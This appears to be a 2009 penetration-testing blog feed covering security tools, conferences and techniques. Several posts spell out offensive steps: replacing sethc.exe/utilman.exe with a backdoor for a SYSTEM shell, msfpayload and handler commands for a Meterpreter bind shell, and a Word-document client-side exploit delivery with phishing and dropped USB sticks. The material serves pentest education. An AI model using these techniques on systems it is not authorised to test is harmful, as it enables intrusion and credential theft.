Laramies Corner

Owning Windows 7 - Double hack (physical access required)

noreply@blogger.com (Christian Martorella) — Mon, 09 Nov 2009 23:08:00 +0000

Hi all, i finished my Windows 7 upgrade and i decided to check and old trick that worked on XP and Vista, no foo required, it's an easy one:

If you have access to a Windows 7 Box, you can still replace the binary c:\windows\system32\sethc.exe by your favourite backdoor (you can insert the same binary with the meterpreter embedded) and trigger it pressing 5 times the shift key on the login screen. Also the trick works by replacing c:\windows\system32\utilman.exe, and pressing WIN-U in the login screen. (you must boot with a live CD in order to replace the binaries)

I know, i know.. if someone have access to your machine it's game over, but hey this it's still there and this could have been improved and avoid the direct calling of two binaries by a key combination.

You can see the double cmd.exe popping one for sethc.exe and the other for utilman.exe, both with "nt authority\system" privileges.

If you don't have your disk encrypted you should do it... if you have it encrypted, beware with the Evil Maid.

Enjoy,

Christian

Pangolin and your data

noreply@blogger.com (Christian Martorella) — Fri, 08 May 2009 16:42:00 +0000

This will be a brief entry about a dubious behavior of Pangolin (SQL Injection Tool). Today we were checking some of the features of Pangolin, and i had special interest on the ORACLE UTL_HTPP injection, i checked the options and there wasn't a configuration for the local HTTP server, so i was wondering how the hell they got the results back.

So i started Pangolin against a test server, and there wasn't any open port in my machine, next step my coworker Javi, launched the attack and sniffed the traffic, all the injection was urlencoded+Oracle (char) encoding, after decoding we found that the results of the injection is sent to a nosec.org web server, and then Pangolin perform a GET to retrieve the data. WTH?

At least let the user know what are you doing with the data, i don't think this will make penetration testers happy, knowing that they customers data is traveling via a third party server.

Be careful where you send your data ;)

-CMM

Information Gathering: Delicious

noreply@blogger.com (Christian Martorella) — Tue, 28 Apr 2009 20:28:00 +0000

Here is a new source that could help you during a Penetration Test, it's not a source that will give you results most of the times, but hey! maybe you are lucky.

Delicious is a service for keeping your bookmarks in one place (online), it's social bookmarking.

So let's go with an example; if you have some nicknames from your target, you can search directly on their Delicious profile, all their public links, for example my profile:

http://delicious.com/laramies

Remember that users can mark a link as private, but here is where we can be lucky if they forget to save it as private.

Another way of searching in Delicious, is using target company URL's or IP's, in this example i will use just a standard internal ip:

192.168.1.1

And look the second result:

The root password in the url :)

In particular cases you can obtain interesting results

-CMM

ProxyStrike Plugins update

noreply@blogger.com (Christian Martorella) — Tue, 28 Apr 2009 20:00:00 +0000

Well this is a short post, just to let you know that the plugins framework of ProxyStrike is updated, making easier to develop your own plugins. Here is a diagram of the internal structure:

Now each plugin is a file, and here is an example of a plugin for gathering all the email addresses:

class email_detect(AttackPlugin):
       def __init__(self):
               AttackPlugin.__init__(self,name="email detect",variableSet=False,iface=True,type="tree",fields=["Url","Email"])

               self.emailre=re.compile("[a-z0-9_.-]+@[a-z0-9_.-]+",re.I)

       def process(self,req):
               html=req.response.getContent()
               a=self.emailre.findall(html)
               results=[]
               for i in a:
                       results.append([i])
               if a: 
                       self.putRESULTS([req.completeUrl,results])

You can find more examples inside the plugin folder, just get your copy via subversion:

svn checkout http://proxystrike.googlecode.com/svn/trunk/ proxystrike-read-only

More information in the wiki, and you can follow updates by deepbit in his new blog

Enjoy

-CMM

Meterpreter Post exploitation - Recap

noreply@blogger.com (Christian Martorella) — Mon, 20 Apr 2009 20:00:00 +0000

I have been a big fan of Meterpreter since it first version, now i would like to review the different cool things and plugins that are around for this feature of Metasploit, that covers the post-exploitation phase. As explained in the first Meterpreter paper:

Meterpreter, short for The Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that would otherwise be tedious to implement purely in assembly. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared ob ject (DLL) ﬁles that can be uploaded and injected into a running process on a target computer after exploitation has occurred. Meterpreter and all of the extensions that it loads are executed entirely from memory and never touch the disk, thus allowing them to execute under the radar of standard Anti-Virus detection.

First of all, i would like to remark that i use Meterpreter as a standalone binary most of the times. To create a binary for uploading to a server you can use this command:

./msfpayload windows/meterpreter/bind_tcp LPORT=443 X > mymeterpreter.exe

Once uploaded the binary and executed (i leave this to you), you have to launch the multi_handler exploit to manage the connection to meterpreter, in this case:

./mscli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E

Or inside the metasploit console:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp

msf exploit(handler)> set LPORT 443

msf exploit(handler)> exploit

Well once we have a working connection, these are some things that you can do:

-Port forwarding: You can make port redirections,

meterpreter> portfwd -a -L 127.0.0.1 -l 444 -h destiny -p 3389

-L = ip that will hold the listening port

-l = the listening port

-h = the target host

-p = the target port

Now you should connect to the exploited machine on port 444

From Oracle to the OS with Metasploit

noreply@blogger.com (Christian Martorella) — Sat, 11 Apr 2009 10:16:00 +0000

I'm back from my vacations, and it's time write some new posts

I read an interesting article on how to obtain a shell through Oracle Database, this article was written by Alexandr Polyakov from www.dsecrg.com, they have more interesting things about Oracle penetration testing on their website.

The article explains how to obtain an OS shell, via Pass the hash technique inside Oracle, using only an account with the CONNECT and RESOURCE privileges. The idea is to read a file over the network via SMB (ctxsys.context) and connect to a fake SMB server to steal the NTLM challenge-response.

The author explains the creation of a Metasploit plugin (ora_ntlm_stealer) to automate the process, so you can get it by updating your svn copy.

Here is the paper with the complete information

Enjoy

-CMM

ProxyStrike v2.0 released!

noreply@blogger.com (Christian Martorella) — Tue, 17 Mar 2009 22:55:00 +0000

I'm pleased to announce a new version of ProxyStrike, an active Web Application Proxy, a tool designed to find vulnerabilities while browsing an application. It was created because the problems we faced in the pentests of web applications that heavily depends on Javascript, not many web scanners did it good at this stage, so we came with this proxy.

Right now it has available Sql injection, XSS and Server side includes.

Highlights from this release:

• Plugin engine (Create your own plugins!)

• Automatic crawl process

• Request interceptor

• Request diffing

• Request repeater

• Save/restore session

• Http request/response history

• Request parameter stats

• Request parameter values stats

• Request url parameter signing and header field signing

• Use of an alternate proxy (tor for example ;D )

• Attack logs

• Export results to HTML or XML

* Sql attacks (plugin)

• Server Side Includes (plugin)

• Xss attacks (plugin)

Check it at: http://www.edge-security.com/proxystrike.php

Here is a video of the tool:

Great Job from Carlos del Ojo (deepbit) for this new release

-CMM

Security Industry Salary and Certification Survey 2008

noreply@blogger.com (Christian Martorella) — Tue, 17 Mar 2009 20:31:00 +0000

Sans Institute released an excellent study about the salaries in the Security industry and relations with certifications. This is a great study for the professionals to know where they are in relation with they career. I would like to see one of these studies for Europe, this one particularly covers USA.

The survey shows that the Security industry is one of less affected by the crisis, and where the companies plan to invest in this year.

If someone need help for a European version, let me know.

Download here

Here you have some interesting bits:

Salaries for information security professionals are high. Over 38% of respondents earn US $100,000 or more per year.
41% of the respondents said their organizations use certifications as a factor when determining salary increases.
The overall mean funding for training was US $2,854 per year with a median of US $2,000 per year.
Digital forensics, intrusion detection, and penetration testing are the technical topics respondents are most interested in learning in 2009.
As of late November 2008, just over 79% of respondents forecast no information security personnel reductions in the next 12 months.
Over 25% of respondents plan to deploy the following technologies in 2009:
- Configuration Management
- SIEM (Security Information and Event Management)
- Storage Security
- Wireless Security Solutions
The best places to find an information security position are in the metro areas of Las Vegas, Nevada; Dallas, Texas; and Washington, DC.

-CMM

A fresh new look into Information Gathering v2

noreply@blogger.com (Christian Martorella) — Tue, 17 Mar 2009 20:05:00 +0000

Here is the new version of my presentation "A fresh new look into Information Gathering v2" that i presented at FI ST Conference Barcelona one week ago. It's a overview of some new sources and mostly based on Metadata and Metagoofil V2 (coming soon)

If you have some new source or technique that want to share, you are welcome :)

Download here

Enjoy

-CMM

SOURCE BOSTON experience

noreply@blogger.com (Christian Martorella) — Mon, 16 Mar 2009 20:50:00 +0000

I recently came back from Boston were i attended to the SOURCE Conference Boston.

It was really a good conference, an excellent speaker line up, and a great environment to do networking and meet new people from the industry.

The conference had a great balance between technical talks and business talks, addressing all the needs of a security professional.

The conference started with an excellent speech by Peter Kuper, who gave his vision about the security market in these turbulent times. (speech transcript here).

Then during the conference, i attended the followings talks:

How Microsoft fixes security Vulnerabilities, interesting insight about what happens behind the courtain of a security update.

Politically Motivated Denial of Service Attacks, Jose Nazario.

Mac OS Xploitation, Dino Dai Zovi (Dino promised to transform OSX in a first class citizen in Metasploit)

Attacking Layer 8: Client Side penetration testing, Chris Gates and Vince Marvelli. They show how easy is to own the end user.

DNS: Towards the Secure Infrastructure, Dan Kaminsky. This was the same presentation as DC.

Day 2:

L0phtCrack 6 Release

400 apps in 40 days, Sahba Kazerooni. He explained how he faced a weird project of 400 applications in 40 days.

Get rich or Die Trying, Jeremiah Grossman. A cool talk on how to earn money exploiting different application vulnerabilities.

Vulnerabilities in Application Interpreters and Runtimes. Erik showed some vulnerabilities on different widely deployed interpreters and runtimes.

Day 3:

Dissecting Foreign Web Attacks, Val Smith. Val analyzed a web attack from start to end, great info in his talk.

That's all for 3 days.

Greets to Chris Gates, Vince Marvelli, Val Smith, Jose Nazario, Stacy Thayer, Christien Rioux, and everyone that i met at Boston.

Now SOURCE Barcelona is next, in the coming days we will launch the Call for papers, don't miss this great conference in this great city :)

-CMM

Fist Conference - Source Boston

noreply@blogger.com (Christian Martorella) — Fri, 06 Mar 2009 22:54:00 +0000

The FIST Conference is over, i just came home and now i'm preparing my backpack for tomorrows trip to NY and Boston, were i will attend SOURCE Conference Boston :)

The talk of Jay Libove was very interesting, he made us think over the ethics in our career, and

Vicente Diaz talk about eCrime economy showin

g some unbelievable facts and numbers, we are really outnumbered... My talk was about Information Gathering, Metadata and Social Networks, showing how easy is to obtain information about individuals and companies.

The slides will be available soon at www.fistconference.org

Here is a screenshot of the next Metagoofil version that i showed today:

Yes it has the "Analyze local files" that many of you asked for :)

-CMM

Warvox: Wardialing refreshed

noreply@blogger.com (Christian Martorella) — Thu, 05 Mar 2009 07:53:00 +0000

The people of Metasploit released a new tool for performing Wardialing attacks. You must be wondering why a new wardialing tool in these times?

Well they came with a new idea, on using Voip services to perform the scans and they claim to reach 10.000 numbers in 8 hours aprox. No modem needed, yes you read right.

One of the great things about the WarVOX model is that once the data has been gathered, it is archived and available for re-analysis as new signatures, plugins, and tools are developed.

Also is interesting the analysis they perform, because they identify more things than a modem attached to a telephone line:

This model allows WarVOX to find and classify a wide range of interesting lines, including modems, faxes, voice mail boxes, PBXs, loops, dial tones, IVRs, and forwarders. WarVOX provides the unique ability to classify all telephone lines in a given range, not just those connected to modems, allowing for a comprehensive audit of a telephone system.

The tool is coded in ruby and you can download here

-CMM

Quick tip: Sharing a directory over the web easily

noreply@blogger.com (Christian Martorella) — Tue, 03 Mar 2009 22:06:00 +0000

Sometimes you need to share a file, show someone a file, serve a client side exploit in a local network, but you don't have a web server on your machine, or don't want to upload the file to a server... Here is a very useful tip to run a web server serving the actual directory with Python:

shell>python -c "import SimpleHTTPServer;SimpleHTTPServer.test()"

there is an easier way:

shell>python -m SimpleHTTPServer

By the default it will use the port 8000.

You can create an alias for easy launching

More shell tricks in Shell-fu.org

-CMM

Client Side exploit Delivery - Word files

noreply@blogger.com (Christian Martorella) — Mon, 02 Mar 2009 23:19:00 +0000

Today i will do a brief post about how you can deliver an exploit URL to your target.

I was reading the SANS storm post about MS09-002 XML/DOC initial infection vector, and i wanted to try it. Here is the information from SANS:

After many failed attempts and some research, i stumble and old post about a XSS in Word documents where the steps to accomplish the XSS where:

The html file content:

So if you change the value code by your exploit serving URL, you will get your exploit served when the target open the Word document.

In this example i changed the value by "http://www.google.com" and the results when opening the word file:

And in the next page is the little frame with the page loaded:

For doing it in a cleaner way, your page will be blank, so there will be no trace at plain sight for a typical user. Also it's possible to play with the object size and location. Also depending on the configuration the user will receive an alert saying that an Activex is trying to run.

So for your next penetration test when you need to perform a targeted client side attack, fire up Metasploit, setup MS09-002 build a Word file, send emails with juicy Subjects , leave some USB sticks on the building and wait :)

-CMM

L0phtCrack is back with L0pht

noreply@blogger.com (Christian Martorella) — Sun, 01 Mar 2009 18:51:00 +0000

I read via Christien Rioux twitter, that L0phtCrack is being reacquired by the original authors.

They are preparing a special information session at SOURCE Boston (Thursday 10:15 am), and they will be releasing version 6. Also they will explain the story of the product from the days of L0pht, @stake, Symantec and L0pht again.

Check this site for more info soon.

I will be there for this session!

-CMM

15 Minutes Penetration test

noreply@blogger.com (Christian Martorella) — Thu, 26 Feb 2009 20:12:00 +0000

Here you have two interesting videos from Ryan Linn on EthicalHacker.net , reviewing a fast Penetration Test using Nmap, Nessus, Metasploit / Meterpreter and Ophcrack.

Video part 1 Nmap, Nessus, Metasploit

Video part 2 Meterpreter, Ophcrack, Command line users

This is a good time to say how much i like meterpreter :)

Enjoy

-CMM

Google Safe Browsing Diagnostic

noreply@blogger.com (Christian Martorella) — Wed, 25 Feb 2009 23:19:00 +0000

Today i read about Google Safe Browsing Diagnostic report, and it's really interesting.

Google is providing a security diagnostic report about web sites, where they give:

*What is the current listing status for [the site in question]?

We display the current listing status of a site and also information on how often a site or parts of it were listed in the past.

*What happened when Google visited this site?

This section includes information on when we analyzed the page, when it was last malicious, what kind of malware we encountered and so fourth. To help web masters clean up their site, we also provide information about the sites that were serving malicious software to users and which sites might have served as intermediaries.

*Has this site acted as an intermediary resulting in further distribution of malware?

Here we provide information if this site has facilitated the distribution of malicious software in the past. This could be an advertising network or statistics site that accidentally participated in the distribution of malicious software.

*Has this site hosted malware?

Here we provide information if the the site has hosted malicious software in the past. We also provide information on the victim sites that initiated the distribution of malicious software.

This service is very useful and is similar to McAfee Site Advisor, you can check an example report for doubleclick.net here where in the past malware was detected.

This report is what google knows about the security of a site, better said the potential security risks that you can find in a site.

You can access this service via the website, or via Firefox "additional information"

More information in the Google blog

-CMM

FIST Conference Barcelona March 2009

noreply@blogger.com (Christian Martorella) — Wed, 25 Feb 2009 23:03:00 +0000

Next March 6th we are throwing a new edition of the FIST Conference here in Barcelona, so if you want to check the program, you can go here

I will give a talk about "A fresh new look into information gathering", where i intend to present the new beta version of the Metagoofil, and some new sources for Information Gathering.

Vicente Díaz will continue the talk he gave at the last FIST Conference with new information and facts about cyber crime and the business behind it (or in front of it), very interesting and entertaining talk.

The location has changed, and this edition will be inside the FiberParty 2009 event.

After the conference we flight to USA, first NY and then we head to BOSTON, to attend SOURCE Conference.

Please join us at FIST Conference :)

-CMM

Black Hat DC 2009 - Slides

noreply@blogger.com (Christian Martorella) — Thu, 19 Feb 2009 23:04:00 +0000

The presentations of the last Black Hat DC conference are available online, here are some interesting talks:

DNS 2008 and the New (old) Nature of Critical Infrastructure, Dan Kaminsky
Windows Vista Security Internals, Michael Mukin
Dissecting web attacks, Val Smith & Colin Ames

You can download the presentations here

Enjoy

-CMM

Fast-Track - Automated penetration testing suite

noreply@blogger.com (Christian Martorella) — Mon, 16 Feb 2009 22:52:00 +0000

Fast-track is

"a compilation of custom developed tools that allow penetration testers the ease of advanced penetration techniques in a relatively easy manner"

Fast-Track has tools for MSSQL server, SQL Injection, Metasploit Autopwn Automation, Mass Client Side attacks, exploits and a Payload generator.

The idea is to provide easy and fast to use tools, that will usually take you many steps, or some minor coding on existing tools. I liked the integration with Metasploit payloads.

It's like executing scripts and tools combos :)

You can check a video of the SQLPwnage module in action:

Fast-Track SQLPwnage from David Kennedy on Vimeo

Presentation of Fast-Track at ShmooCon 2009, here
Download here

Enjoy

-CMM

CUDA and bruteforcing

noreply@blogger.com (Christian Martorella) — Wed, 11 Feb 2009 22:48:00 +0000

Did you hear about Pyrit?

"Pyrit is implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff"

Pyrit exploit the power of the new GPU, like the Nvidia family that support CUDA.

"CUDA is the compute engine in NVIDIA graphics processing units or GPUs, that is accessible to software developers through industry standard programming languages"

Just look at this comparison of pyrit running on different graphic cards:

Well I wanted to know the performance of my GPU's, so i did some test on my Macbook Pro unibody, that has two Nvidia graphic cards on board, and here are the results:

Nvidia 9400 M

Nvidia 9600 GT

With the 9400 M i got 690.67PMK/s more than 2x of the CPU Core2duo 2.4Ghz, and with the 9600 GT i got 912.77 PMK/s almost 4x !!

Now it will be sweet to have both graphic cards working at the same time ;)

Pyrit is included in Backtrack 4 and in the next Pentoo release!

Also i tested another CUDA based bruteforcer, "Multihash Bruteforcer":

The world's fastest cross-platform MD4/MD5/NTLM cracking
for Windows/Mac/Linux

Here are the results on my Macbook Pro:

I guess that this tool will improve over time, but they are giving great results right now.

Enjoy your password cracking

-CMM

Backtrack 4 is here! - Cuda support

noreply@blogger.com (Christian Martorella) — Wed, 11 Feb 2009 21:15:00 +0000

The new Backtrack 4 beta is out!, you can download your ISO here, also you can check the backtrack 4 info on their blog.

The most interesting feature is that is based on Ubuntu, this mean that will be easy to update, maintain, create packages, etc! The Backtrack team wants that besides of being your live CD, to be your every day desktop, and with this change i think that a lot of users will make the change.

Another feature is the support for pyrit and CUDA, to exploit the power of the GPU's.

Enjoy

-CMM

Web Services Security testing

noreply@blogger.com (Christian Martorella) — Tue, 10 Feb 2009 07:47:00 +0000

Last week i had to perform a penetration test on a Web Services environment and during the project i found the following interesting documents:

SIFT - Web Services Security Testing Framework V1 - by SIFT Link

This document is a great resource.

Web Services Security - by Bilal Saddiqui Link

Exploring Web Services Encryption - by Bilal Saddiqui Link

More on Web Services Encryption - by Schmoil Link

Seguridad en Servicios Web (Spanish) - by Oscar Gonzales Link

About the tools, i had some trouble with the usual hacking tools, we didn't had UDDI or JUDDI, so we had to hack the application server (Jboss) and then access the Web services admin panel, to get the WSDL.

With the WDSL i proceed to perform some bruteforce attacks with WebSlayer to find a valid username and password for the WS-Security (client authentication).

The other tool that i used was Appscan, Web Services Power tools that allowed me to get the descriptions, and perform request, but i didn't liked the way it handle the raw request...

Another interesting tools is the SOAPUI, the web services testing tool, it's very complete and i'm still learning on how to use it....

Also we used WSFuzzer from OWASP. Here is a video on how to use it

UPDATE:

TSSCI - Writing a web services fuzzer in 5 minutes

Any other interesting tools or document?

-CMM

Protecting users from password theft

noreply@blogger.com (Christian Martorella) — Fri, 30 Jan 2009 06:33:00 +0000

A very good article from Chris Eng (Veracode), about how developers can design a strong password scheme in the applications to protect users from password theft.

Suppose that your database is stolen (hope no) is the data protected? the thiefs could revert back the passwords easily? In my lasts pentest the passwords were stored in clear texts..... so it's common practice to have the password stored in an insecure way, or even clear text.

Here is a good practice for your developers or customers:

Veracode - How to protect your users from password theft

-CMM

PCI for dummies

noreply@blogger.com (Christian Martorella) — Wed, 28 Jan 2009 09:18:00 +0000

Qualys, the leader provider of vulnerability scans, has published a free e-book entitled "PCI for dummies", if you want to get a grasp of what it is the PCI (Payment Card Industry), and learn how to comply with it, you can download your copy here:

http://www.qualys.com/forms/ebook/pcifordummies/

Enjoy

-CMM